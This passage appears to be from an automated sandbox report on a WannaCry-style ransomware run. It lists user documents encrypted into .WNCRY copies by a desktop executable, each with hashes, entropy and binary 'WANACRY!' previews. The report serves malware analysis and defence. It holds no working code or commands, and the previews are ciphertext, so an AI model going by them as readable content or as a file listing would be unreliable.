                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....v..V...Y.)?..d..]s.......x2.A..%'.b .D...lb....(.e...>3.^.ZB..}.l.....r.....ge.(..X....51...=t./.t.'.C:+q....?a$.g.......k>..[Vo....]...D.Q.aJ8.K...{:o..:.0...5..o.xW...{u....<O......;.4.......B.....l.|t.....>".......2}.....U.'F..Zk....u.u.a^=.................jjh.6...........=.%.3...B.gB.'......si...yX.{....m%...K...R...-.9..2.b"...lmW.&......Z?*q......(\....e.....}.N.\.:.H.|.0.T..G..m...J..,vq...{(|.x....xv....a....k......O...UR9.vC......0.S.G......=...R+e...T.t..M....)kFW........]#..................O,.L.n..^0]'......h...`U.Y.j5.;..t1g@X.1`..i..d..o`..l..U.W.?!..S..$h.. .2;.M!Q.I.(.$G.+....u..#.6.....hq..<.!..H@S.j........_...g.x..8MGM....X...e'..........T..."..)G_t(S.E].&U).V.Bu<...o.kI. T...Xe.s.V.5'/.H...IQL..}R1...eM[\....X:....?B.<)1..KWn.F.~p.in....En.i}.(...@'....-.....L........x.... B...).4..7......T...}.."._.9..M.=.#.D..9.Z.%.... ..Y...\G./.p.)M...@.=..aH.....i...+C%A..i.j.i"....|..t_.......v.y.}F%...f...0......U.

                                C:\Documents and Settings\user\Downloads\BJZFPPWAPT.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8505685355613
                                Encrypted:false
                                SSDEEP:24:bk/xlR+gOH/vnTIn1tH4fv6m0kPwx3JqyKAVXwkmeSILX:bk/RkfG1tHeoJq6Hme3
                                MD5:1E5C277D620571C2E899B291161AF83A
                                SHA1:0A25848000F6BC17AFD724107DC08E968DB0C35F
                                SHA-256:F0D3CC05FCB513C107DA7F23C3E41B37766945EFB6F6EA244A6E651D6C989EF5
                                SHA-512:60987DF412BEB71756B9A43C2A54AC15C62804191F84B2CA43FF0315D6CB50DF6FCBDEBE6DA78024B6D33FCA02AB70DAC71343C8B467DF4FCBE0DFAE411FD58F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....a..T9.<.^..Aa.kG+._,......rl.6~.k...{...Ry...vkE.GM.E..s\.....Y....t.dZ.......q.Rt:...Y5h.^.tc.k...`.Ob.3...d..6io..xU._.`cS.E..........f.p....I.(......`.V..{.wt.:.t...?,../..n..(\dA ......d..0F]$...Vt....].S.(4.z.......2a.....".O0.Hm.................:P.X.i8.. T..T.7uJ...t...`.Mu7.d{Q..u.;..u...........y.Y.....V.f..[..L@..6..q.7...|.............K.`R.F.d{R.[....A...~.....o!.*.$Y.....K.v....),).V....`.Q.k..L*.+.,0.+6q...,.$.r.,h.S%E....D..2#....c.~aD..z.%.F.Oi;...y.Os....`.["..^S.q....m...\.mh.mT..c....hZ...w..yT.q5w.YQY...aX1.x).T.B=..T<.....{.v...Ovy..E...P...a.@..*.Bun...8.......[.....8......u.1.. ..,y..........t..Q..i0......p.i............$...O....J\..*...B..'.E...=S.{...r......E.Mc[.......o...~...X.....%.I.{"...DR..5."......J.D>..F...,..".7...kj..zV.....,.D..$%G..@..T.0..o.g_..........:.y....tbM...9+u'....I..>...R..]...5...yp....l.....o.Y.9/.....j....j..0@S.\...{+... ....L*.d... .<H..H?.d...{...@.%.....

                                C:\Documents and Settings\user\Downloads\BNAGMGSPLO.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814028573461258
                                Encrypted:false
                                SSDEEP:24:bkmY3RoUPTqMKQX+hPc6UownNv1754jF1wi2LrRGnkgKN+W4:bkmmRRrqMRXec6Av1mJOjR9nNW
                                MD5:FA3954774C3BED2B0C03FA7ED3B0D995
                                SHA1:F0EAC93DB39695ADC1B015B63798850034DFAE8E
                                SHA-256:AFA7AD6B2DAF8E270CEC41CCDFFF8DEE27F9DA0F4E92780DEB854712768542A1
                                SHA-512:1D84901E540121B3375A2D51F616819BA12E584A379288D62E203C57BE7AC4756E15F27956532605E97CF20CB1CBE525CF4803B7C4EF94EA76CBE4554F8A8222
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....k.@......Y6{.Q.s..5......."..,.I.1\._.&..?.w....$w..z4..F.M.Y.0.f.){..*M....~...x.L.....j.A.....%"&....#[...`.{.....nuz...l.G..Pp4..}.K7.[..k.J.|..K.X.Z.D~.U..^. 6.|?%.7o...E.h..V...paO.an...K..3>EK]m........(.J..........Kx.m.%..w9.t.3Ge../...M96."............;h.oS..U(.8............8...X..wQ.}N.B.:.....q9Q%.a.tg...W.....Rz...t.P...........i(@.z.Lj..B.Q>J...eg.......i......hf..O..m#..P.|.\..^.....)...x69..wY.L0:.d.c.|...."R...eC..Ci`....Z...Z...p.E...7}~..k....U_X....1..&.uC3~...r...x...G..2...R.._.y.._:...t...r...........T..Y....*.y#....L.Sx...}..XW.......t7..C.R..Oh`..2..8.... ... NJ..W....].l.V..A..}..r..Z..7.f._.jA.....Z.Y.eY.DO4.`XL...4b.02..u...m...>....#]..S.ze8......y.R,.......t.....W..7........Ag..B.q....,Ql.2..{WDE..9.7.......x.rz?...N1...A~.i........0....m...=-#^.....C<..y...B..S..L...2....j..1...u...c.....W..}u.....(.L6.+. ..........^1W.u2......\. ....A5>.....h..q|......GW[..S.1.q..../..f`A...*{....`5\.

                                C:\Documents and Settings\user\Downloads\BNAGMGSPLO.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8433977714800385
                                Encrypted:false
                                SSDEEP:24:bkUZNLqZ12toDwSxwksoiUWxO5qD9J16s4qWOmJwmB5TVgPBzxra:bkUZgZ12tUDRFi15Lo95O+w65Z0Za
                                MD5:794F8BB42C90B566FA9CAE748E9893A7
                                SHA1:D9F03C214BB83DBB391F39E7EB1CE901AF9C2585
                                SHA-256:C66A0F5626178A25A8CD961B9F3BC9423638F815C6F6FD7AB9DAC10345B549B9
                                SHA-512:453A31C57C19079C6278C31763C91C64DE678B5041C9D32A48F44BBCD2D08E1A4EFB9FB743F468D4EA49350A7B90E2DF3103BC8E3003AD00617751FCB21FB332
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....M.PO.......^.\a.-...8}j.sJ...-$.x.*\..n...&..X.2.tR...U.J....1..`...<...$.X...~....M. .:.....^G<j....t.:.A.6e)....s...g..w....o...$.+..+'.....c8c.m.@.9...h.Q.U.Px|`1. .;.'........l.<..3n.2a...djq...l_.....j76..*..ZJ.:.=+..00 ..K.~G..A.......O.3.............'.N.N.Nz..x....../99.%!L.B.n.k.._....5.g...*./...p....f..V.e(... ..T/4..v%.]+....I.o..\.%.Z.B..3...d.L/.?_l3..r.}.1.'.w=<..t.)...k......z.kQ.T..."....5.D.4.7..Bb.U.3B..%.......Xa@V...c.1S...T...<|.Y..B......h.l`.. Z. P..9....v.E(.U...ZS..n.x.}}G..&..@..F......4$...yX.^.;)d..`..Tb.a.<.c...u.....O./..:\.#|.*lU_.W'.M..}5r...+.......Zr#p..=..3..?fp.I.'...ar......(...1.|z.$..M..?._........R....OTD...l.L..F.......$Y...e#;a...N..?..@Cw...z.....|..D...S.<...:........,.bQj`.....&'...f..yb...-...d.....9..7)w.e.8.C...(I1B.C/...<.bAp.|..).5|D.;....a../.0..O"h.Y.X.._c...z....h...$N.U.w.w..j.......:.0.p.K.Z.......Y.....F8;..gp~..7....5...)W.......Z.n3R4......O.M.[..yb...H.F.]X(*t

                                C:\Documents and Settings\user\Downloads\EEGWXUHVUG.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8307922297876615
                                Encrypted:false
                                SSDEEP:24:bkCshLIvt+eIwfOb9qhz46lcmxxqzxbumO7WUZe3MAFyMBRREW1mDCBmeMOA+yTe:bkCnzbfBhzgCAxCkUIt3EWMC0eMcl
                                MD5:51945D90B02325120FBE1391081280D6
                                SHA1:24FAF4FE9B05E32D422C0055658C749EE53D5D84
                                SHA-256:07A7D3B178579AF322C4E52005479633912CFFFDA2B8E562CB2827EBE554A30A
                                SHA-512:4B0587976C065F9E99E135878799C698280ADE00B02B6CC3C571B99D255EBBB7941B62554988CC472AFA9351AD7BC3A7FB1BFC81782E091EB2F70122678F521A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....;...:b.`.r. Ja.f.:0.!....b..../.{`..."...1t/..}.6....y.`.C.9+.....d.+.1Mc...V....LC...B...6.p..%..Wx.Oj.,R1..Ht.y..,............z'^.{n.iLC..uX.?...F.f#M\m..70..L.^.|i.....6-.(.i.Z.8a.1.S<...]._Z.1T....p.-...f.:rs.R.h..]...*iWQI.-........"=..=fK.>Y............9........o.`.m.3$...=|.N...e."n..^X...mB....Q...)......./N*.,%.[.#.2C..W...h>.DB...*.W...../.R...%.`.8(H..O:.'#.-.....|..eu......W....M/g.. ...5.[4....bv...;....P..L...bE.w...S4`.-.=|.-.7k....jq.N3r.A...k..g./L.d......iY.......v/[.............6B.6.-..ER......*..Q.hm...Q=......<......ET.L./........^8s-....B...|..5.P..e...N.6w)Ps..........n.9Q{.._..-..C.AZ.i$A..'..w)%...}.+.4Wq.6.;..3c.o.........".1M.!.........i..x...\..~.SN.4o.H(.W.1..0".z._o.R^......e...K......8..........%.!g..{A{.mH.~5...K.8.....+...|[/.O.....~.mF"L....q1..c..{b{O.%.>...Up.n.9...Q.....>...o..4}F.6...l.zR=.hR.-.v..3.lfH.........4...P...d~g.aA....`P..D ..gs@.G~......].%.*.r..O_*^,..5..> +...K.,.A.7...6.u.S.8|.

                                C:\Documents and Settings\user\Downloads\EEGWXUHVUG.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849610407296905
                                Encrypted:false
                                SSDEEP:24:bkLwiL/pEep6VotNcoR+kA9K02Q8DnOZtiAagOV8WcEy3JkAPQG7dwqVgl3:bkLT/ZpEotNcoAkdO46tiAO8gkJk+7dW
                                MD5:6B73524B59B45C1F19AD3421AC7221D4
                                SHA1:A0E76F6CC37A9C393E8889D9216C6B75B5DCE5CD
                                SHA-256:CB5A6950224D0EA4534DDE00C97F6E638B593FB29C535545667685F82E36F7D7
                                SHA-512:52C3B93AFB8D1C1CC3849C56DF7EC25C84BCF7E0E2AE94A4920D57B5350265ED36249C87F63027B09C39D9E7002837EE6E6EA1515B1A8FD9FB4861332823E38B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....t=..7{.u.....O..../..t....a..Oc.. ..)..*...=.=..).E!S..C...7.v7..(...6....>X.......=+#..^....F...<..u..b..).a.1O..M....>...pz...dF..zV...O......C&..:.2..e...6...`j.....J..s..s.k.jC.#.I.......+.,=..BVa....\.G..E9.z...N{HY..[.b.....E...xr.............rr../T.AZ..2.r.@].@E"&U\v.Q_a..C.!JO.X......H........C....e...p.{...s...8.6.".p.,.. R.x..l...<...rCpe...(E......7=..>..h.......PX_M...YS......|...'....y........q.9.M.1mT..aX.alT.]...w....%U..b.}...M..J.w.L..j...?....k.*_=..R...I...?.E..jdi.....|,.(..X..(Ee^9....?..P...wOqn...|.....X_*..~Uzcy..5T.s...?..[..j.....:.......X.._'.P+.}A.$.i.yo..,N.....?K.....mY.;H.5....=j.:'........N3......@H.y.E.4%C....$..^...j...x.2/&.hX..V!......5...6..r.q...o`...p.u..k]..=4...f$...._.P;P.. &..FQ..g1U_....Ba1....D3....._......Q.. ?.x4..3...'oL....j.Z..i.#d.z.....@..q\..`$..u..z.6......Ud..a.M......2.....cXJ.8I.A|..g.......-MJb.*wj06G.x.A..J........-..:..;....@*.@....[.f|......UY....u..2^]F.M..J.

                                C:\Documents and Settings\user\Downloads\EEGWXUHVUG.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827183757966153
                                Encrypted:false
                                SSDEEP:24:bk9+Elro9Xq4i6luI4V4kOZfTsCErKcaoy/T6x/2t5fWgg8Kn:bk9+ME9LiRV2sCeKcS7aujWgg8i
                                MD5:EB46443E15D80AE116C4DFF6D6ABDFA2
                                SHA1:4BD3E8BFC9BA7FDE65AA6FDEC8D6458690DE928F
                                SHA-256:015BAF595D6A70164F487EC960938A58A061A981C7B06D2B0A0481E082CBD624
                                SHA-512:A6F5FE08B6056A43C9F1EF2C09B0043FB6EF4EE51FEF316604D5E49FFD59051F98FC40EF5360F845CC615BEB73B17D3E96B79735457157723D459981348F767A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Q...5i......WW...3....AI....UX{2f |...n0.............?!3S..w.U.3....]....>...4.a].. ...^..7....3..."..b....2...?.....>.....p.%..4...]c....6..:wRyq.ou.....<.....R.L..[.|..k.d..X.....I..X........m...&g..rY..hSn...oK.!2.....}..5mb+#s...................H.'o%h.f......+>..^.J...:Pw_Jy.WXY.s~-.$v.t.).U'..[..Cpg..h........s...o.e..u..+.:b.~......6V......}...e.6.X.+..e&..:D+....M.X"...4N..^#.....}.i.1nC.=.k)..|ST...!...a.ro..i..2y..{=.......5.[!.A.Q..Ac$p3n|=/`W.^...pv*.?.K$.7.c#v.....1.J..K..Y..y.f......o.f.2vC . VD..<rO.^.[.D.R.F/(K...l(.5'v.815..M...pVb.b..Z.#...%4.5.:b.XEJ..g...XW.k7^j..@SU.v..&v9=...c...k..Z.R.W.co...v.F.4.....%....Q.C.=........XP.%....pkC....k..L.)...3.}......R.my...#j..oJ..A[..........q.r.9_A....N..s.\.......pT.n..J.f..-.c...e.[....Ka.a.....X^..DN`....k"Y...P..a.="|.!.y.....3..*#-..HW Q~/.{....-*y.!.e..?B.}Ph....|.AU.wT..?.61a.u..g.cu..L....}.5K..K9..%....)..<p....-.....TT..r4..R...2s..Y....P..e.]4....=5@.p.

                                C:\Documents and Settings\user\Downloads\EFOYFBOLXA.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.829501966490435
                                Encrypted:false
                                SSDEEP:24:bk5Kwyp+nmMAL0msq8Gh969ZF3iK1gdJhg7RzG4FB69mYJdkbTKJzJbzgqs:bk59yp+mhGqr69p+Gz4f7GcZzgN
                                MD5:21258B25FE371FEEAE47C7914FA4413C
                                SHA1:B008F21F954775F6D5F16D6CDF4F16DD41443F67
                                SHA-256:EB52EDAB1D6DD6934B1047D806BAE4C971DAE6D70FDF5B99F163601E3998404F
                                SHA-512:71B7DE90DF176D2F47419DFB7A2C1BE2ABEA154EC81F58C9B4885621A50EF6380ABAF13EF77CAD64095E020690C07A3771F65CCFA44C2D077F0EC79407AA2728
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........{.*.6.....Pd......L)....4c...."5.`s...i}){{.7....8B.$....np..1+.......e.. #.q....U*....wn9.;..;....3{.....%.@...GJ..@xy...A.i...7a7..A....W,.#.B$O.Kr.....Y.pe.A.#.#.m...}h..DI...g]J..\.(...+.B..U.>.n...,. ".Y..x....B..;...G-.'.@I.I ................(~-.@j.@D..J..mM....s.....i...[.T...Y,.9....:.c....|.J..rR?....,....u.a>.. "..1..J.t.v..+..]...F...$..e.t...gK.J.2.4yv......".b....}Q.D.v..:`..o...^...l...).....@_Maa..WW.(.Y...x.>..R{.3.^.3}s..3\.~#L.I ..?o#........gT.}...u..e.K........A...l8..`0na..E..)o....../*[.....c7....l..........[..\.....#U.}.~Y...B....@.Vsf.l[a...1..I.@:Z........?Ls{.N&....D`J..............&.../......2.K.>.....w..._J..3.<.H%....[(r:Y.....Bv...)]...\W{q.....gV.^...j3....0....}Ue......$.....t...?\._..^.\{+..x............J(.lTk..`./G..Y.?.\.?....{G.a.7.....c....l..yW..A5......(Nj](p..']?/n.O^H]c....;x8....z...Q3lA..@..,~;V`xz......@ S.l.a...^.0M....le.l.2.+..U.D...#.........w.....0....9....$?..!Q.h[zj2

                                C:\Documents and Settings\user\Downloads\EFOYFBOLXA.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.825624611685154
                                Encrypted:false
                                SSDEEP:24:bkP1j7EVne+yELihKKAjoc37CPo0MOeSwgpnHBMcz9CBOwz2izUW:bkP1j7UnnLinnYOeSNnH6wOLzUW
                                MD5:F04D85D7B05F7672198B088110326E83
                                SHA1:D2610A5EFB698C6ED09A667EDC0DFC143522FA53
                                SHA-256:6F7EC1BC4085BF7119EEE11EDDE548FA2657B161B18A5D15F2D7408EC5669A1F
                                SHA-512:41C617695F5D490E9406CEB1B14F4E5BAD53EC88CC958713ADF2EA995F12358F78013483850B8A2D5B67A511E15B76D876DAEBC8EFAC865C51405AA513B007CC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....V..}<.x.._....,......)~'.U. .[.4..:k...U..E...u..p.H...*.C......hF..3W.i....e....!"...._"r.......1..M.a..\:.y8h.J.~.1RPIW...6...2..>.....\...s4..x..6v_._4e}...%.....DO.84....9..r..l..u.6...#..mc....9.....LK..g.E.[@.N.<@FjJO..t.V.DF.X...M.C}../...............!.(H....3.."..e.EP!....ay.?C2.z.c.Dr.G.b.Op6.=q@{'.~y.....l...Y...qW.{..5..e..F..Q.Qh..w..+..:..j.s....@........*-.2rA..n7.._O"....i.{..HN&..U._b..T]M.].^.....pYO.....;.......bh.0X.\.....U.....B.Ay.(R.e...,y..*....(kT2...2.W.ZC*....R[da}.Ncwq.g..\...]..A.U@O.b....<.I..ZH.4..q.g.....$..B..:`#.e.O.u..p.K_[.O9Zd...F%.X..G...J...?.f..!C....r.]..^.S..*..\.nQ.......\.e..EfQ....]>R..i..h.I.5.E....d....Ze..s.........x...n..l..?..yW.3.p.O`]..(OO.%vZ....uk.a.:..T.on2.et4Z....2i"..^....mQYO.W1.Z.YhR.C.".5t...U`...)...A.Fc......#~..b.....5.CJ..G.85.....M.Ux.U..V.y....=.<..px...<...".bD.6uZI).$......; .}~(.#...Y;Pm..(4...2.....W^B*e.%]e.I.*...]..........E^_=..!..2B..=...FgiV.p..+......u.....P.

                                C:\Documents and Settings\user\Downloads\KLIZUSIQEN.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8753434673666565
                                Encrypted:false
                                SSDEEP:24:bkdV/Me2kgX6QxO9dR3gEroOrHesuovPUr1LE4GjccfryhoMuogC7TYSdTt:bkvD2kIytcObpu0gXGAu2h5ugkKt
                                MD5:96EFBE79C633FC2B995CA858CD4486C2
                                SHA1:C2BBEF63234AE3C890F38A1DC4A56CE71120E19C
                                SHA-256:CB4F4476D8679290FC9A39811570B6F5A2BB068A2C58FF5AEAC7DBD1C4C467F7
                                SHA-512:70AF35B3666A6D5787B93C903EAF3544CA3EDC2789DA9E5F755E6B806F7B7129CE458562495F1066A2CE81D70A0CB72A96526029A557F42D70BE8649BA625E9D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....`...x....a.D$.cP.a.....wZ.........r.9#.....A..V..#......f.u..._...........aO..M.;.}f.j...a.F..-.\.5S....B.o............>DgO~.M.pR]..r..k.2.c......Hb.:.&5|t._..5....H.f...m..P<.<-.q3.`..N..Q..s.a.><C........h...iL.T.W.w.<...q...j..."S`..W.I...............c.1:...N.I.._.....9.'"y....$\...:.&:....\.....B^.2.U:~r.x...v....4..6..J.U......Z(.e..aGI..... j.....+D...#D......o}..'~.M...sW...".l...`H.l..D.U.).......1Sx..A..5. 1&....9n....Z..kB....%..}.. w..y..@..0..|x.T ......E.>N..s....\"G.Ar...JO.E=..3%].e..u........f-[........q.........g,V.Q..].....v[g.T...9.p.Z..h.P...oB..|.}..a...Ej...R..v.a....f.@.)>5.`X5|.).W..{|6..t.>Q.b?..9..`a..%...(..v...^.....7.....x.$H..?..u......y..}.$......<...-..q.s...D....0+.._3.g......[.=...1.<..).$........../%..N....<dn..rzTW.RH5.-..H...@a.N.....[...+:w9DL..w'..@d..*/QJtTq\...P......h.#u..~w...$p...8.=!.+f... .\9..*#..x$.t...w...85.o^m..L..g>.*f!q&..C...w.<...+DK..1.V...>o.....t...,k.u..m...

                                C:\Documents and Settings\user\Downloads\PALRGUCVEH.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838728057263532
                                Encrypted:false
                                SSDEEP:24:bkxBnLt8TWY+F+WqQpeRT7/ISTZNPVOHDTvbN4Gm43BTAp++hYqFu2RRD0s:bkxBnL6TWYo+ApeRwSOmuqp+sVRBl
                                MD5:821C3F64C2F1FC4412D4F82B5549D4C2
                                SHA1:1BCA29F8840003C2F29D5EE3D9B4B071C7D235DE
                                SHA-256:BA14DFFF6AFB1618A3E686E07C6F43626FAECE4792F69DB6E58F8BDCD747ECA9
                                SHA-512:3211E09D07CBFFE69D6E0AF40429579C09741FD2927E3DEA95A5E2FBAEC96AD11E1854903EC854949E254335A4978A9CBA4DB59BB97C242CA23F89CB0A6377D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X..J...X.#.`nU.RRP&.W..no.............r.MO.E".(E.c.i.V.8.1..".y.yAL...\..'pm.....]. ..E..6sd4w.l..^.x...^..^.u&...a,.5.....-.d.......m.`...Y$.....q.lq..%.\j.....|...H.....o..!.J..5..pd._5...{il`\.$r.$|.WJ.3..6......}{.......E.....BD>......0$D}............dN.!.....k34.?.*..F..........EH.h../.}.$....+......i2lk1..K.Ew.E.......r.i..}..Tn..Js...@0{...y.o.n..N{..+y8....C..>...K7...+mh[.D..z..$p...mmD.vy.nU.....?..$.........Z.%I..1..u:..Xw..g....8,.....k=D.DD..x....1../.).3\.w.sc...p',."#.%&..!v.....K9......z...E.En.VI..X..BK.....G+......d..4..... ....4.}..&....U^.c..r.J.../U.].}f$.$.q...T.vC.t.oO.(.w...0....[.....E.N,..p....oDD5*..Sq..r.....DSg.Q~ ..l..FOy....tH....E.. ....|....y..[,w........................3.. ...}._.........4..2}.............L.X...".K......o.....+NI~k.|E.+B?M..H.(..KZ...P..p.g"..u<.?.8...o..,........s.R1...:>......N..)W.c2.xc.k&a....q.O..a"[.H......U....~...$f.....S.G....r..K..66d.i_..6.......GG.yR.....aS...%....4...`.P&

                                C:\Documents and Settings\user\Downloads\PIVFAGEAAV.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8373031912395845
                                Encrypted:false
                                SSDEEP:24:bk9IqATLZdmCRj4DEBW84sUiqVz8Ol2TORWUTNCyiwvkjrN88KXYQ:bk9IqA3uk4DO4sUiqVIOUpUBCLwvkjBm
                                MD5:8DBB61629DA0D5B28E0603A58A1D5F83
                                SHA1:686354635CCF69C231D65305388F8A28157DB3BC
                                SHA-256:AAEBD1DFDFABB4FE5BFF02B60646227D6EBF3FA03E98A524FEE882EC2FA04D06
                                SHA-512:298601FF15312EB036BED0840A001228AB845CF912860828800C98692020168E447621B9D663159DBF6EE0A505F23BB1F653A6B0BB1C54AB3DE64F6E5D1FA4FB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....s.g.j:...9L...~(.M.a...3......~t.S$..#?B. ~...^%.S......S..Ka........n.U.r..&.$7...........pM../...E..X..U.dn*!k...3AS..?......&....._.6..........7.^..nAxL".8N.......'.2..}]......@........%.'.M....{m..../.HPm.O..!.....E`..{....RJ.(.Es.E...Y$(...................pu..>...eh...rQ...*......qN..pk,..iu...Lb....81y..A.@......2.v..d...~..N.v.E..<.<`..m.b.f.Kl.sky..+.X..o..M.=.OAz.}i....I.\...Z..CH'I/.L..+.^l....p..w..s.9X..oJ2.g5.'>.2..HEH.7..D.<....:.&&.d5c...8.._.._w.L...{.........Q.".{.w.-.~...U..p...".....+J....@...A...qv.6....Q.....b.w.N....PN......p.....a...n..>.a7.N.R..w..u.r...w..f.a... ...."h.C.?i=B..n...)a.mI..(O..o...qS(.R.A.....E..h..:..$..X...TjT.......H.dAG...@..C.p...j..g.$.r .TP3.Ty........uN#SsE/~.[,X.ku...Q..G ..$!...<.lE....t.=\..ra..H.....<V....s....n..M..h.....!%.D.XH.9.....p..l*.XX..7D.6...Z..f.c..b.X.m.VD4.rre.F6.a"Q6sn.W.......%.t..\...&ltv.p...v.YB.g.NW...........m8............2.51...F....MW.....9.6.b..V.....

                                C:\Documents and Settings\user\Downloads\SQSJKEBWDT.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843132259331841
                                Encrypted:false
                                SSDEEP:24:bkuprhblkZWpojcPGB2imvWaO5j07ELdvE1iXBe2Cb8ozzqCF4KObZT+mas:bkQlk/jcPGB2DwjEEh0iPCo8zq6Oxas
                                MD5:3E6B211932196947D58C218A1023D457
                                SHA1:2531319188425695109EC3C908EBE8C275A1B78A
                                SHA-256:6E768F0C94FFBAE75519DB6FE5748D5BBD4FEFC7FDDA36A9FD33E2AD04D31EEE
                                SHA-512:3006DA3378D7DE62CB04959FC0CDF0D12C7F309A9EC482EE163F6131BE83D990170B9DCAA12BEF8659506658472B85A5BDEB746DE2FB9E4A17CDE6502426831C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....^..v..#.-..X...b..Ac....8;728*."...R*..K^....U.f...K..b.K.j.3....\N.|........7.K....?..C.X.vU_$YeV].....l.*.....I./.\.n.....k>c.[9'.j..y..N@E.....T....../.K...)1.B+a..P.gnn.l.,....l.|IG..........Q.>..B>...)..3M.G.u.)...u.3......0B.0...J..F.................A..._{&.......#_T..J.E.......3Q...N.].T.@qU.XCj..*]QH.....pI....5.~..v.q.....V.a......z.(.i...'V.s.]ci..Z..4L.......I.."U.I.....A.".I...gy.#..=..k....m.w.?..T......_.D&.............a[.6.......47....-.{I.%._6....a.T1...1..f.A4..c.DS.......$.g~RKC....g.B..x....ME.UW...N.4a.7.2..7)X......$".|4|........Y`J#.Z.......Q..Y.~v..P.).|).c...q......\..N..y..fv.@..y.Hw.#`$!2|@..o.N......Sa...,.r.[..f#.6..6'.n...m...K...h.`K..Z..}....9.......|..pC.9T.qDN...(.~..........[T.._.+.2.z.%.n..Bw....9.. .P..SP...........x..n=>.R...u\V.g....P....P.6.*.0.........Nz..#V.:z.|.r=?f8?.....f..........I.P..p...Aj.W..I.*....#....{+.....w_.P.........T[_.J...O.n.,..OX.H3...N~)T..j....~.Xg...oYB...x..

                                C:\Documents and Settings\user\Downloads\SQSJKEBWDT.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854865218310198
                                Encrypted:false
                                SSDEEP:24:bku4wO30EvIoHeLiuJdnvvCPns8Nq/NtLBebN+MwLut5IXCUPr4STkzQKokeW:bku4wBE9H+9nSENy3wLO5IF4SozQGx
                                MD5:FC57EAAB47FB58C71CAD1622AB9ACD34
                                SHA1:E6F418406500D2F582C0C38F020F6A8727CF3C2E
                                SHA-256:83B5D6197DA614D6CEC781CE31D21F082B9A9411F97B1A4936F924EAD0412211
                                SHA-512:B2CF7E6ABC014FEE9E7778779BE6CDE014EAF0CBF3846FEF524546A77EDD482BD9BDFDC766DA3F6A37CD742775818441B86FCAE83861728F7F387300BC2B6FB8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....V`.....D..O.z..]..}.-.."..".k..x.{6...E>.....z.Q1..,.L-.Sk.l.1G.......'...W.&|Uo...c<M.I...g..g9u...Kskd...Y.......6[.R..,g.I...lth*...\.]R..B.....~."].....K.l../.......!.....C....V.......l..JQ.Lc..4...R...W.%......b...E.....8.`.-..vm7Q.................,..E...S~nTU.*.o}2b...O...;b.0...k.~.....54=....g...,.D...+.>..z.?M..(.n..T.%..d+.Q'N$..B.6.w..]K....<.d.._.JE.A=.w..E...........pz.,....9.F&..f.....M.!tN.k.M..Z..q.....w..Li.O...S.W....*$=0+[.....6..+r.'...F...-...-dMb..).$ek.x.I..=..Bc....uM....p[X..R.._k..Z..7.".|..@.DXUk.0...dI..&.....Y.h..J|.~.-................(.....^?`O.*Y?.qr.F..r...y)S...[....@..=r..M}.....w%P{..o...P.;...~.H........+.0).@..OI_.Y#...`....H..o..X<r.2;..Lm.a.pR....F.B.1.S.a.6q.F.@.....*...=s)7....p ...^.L../.......\..Y..R..2X.%..I.....zX.D0]eJ.].....;..[..\..r.co...=...A.v...6..Q-...bJM.'..0.{q.t_9p.>!...b0C5.z"G.7g.L....VG... UK...XUa./.~K.....tF...t?........a.sUq.{$.&.-L........E~].1.p:o.C. |.!a?.!qeH..2....

                                C:\Documents and Settings\user\Downloads\ZGGKNSUKOP.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834722866247955
                                Encrypted:false
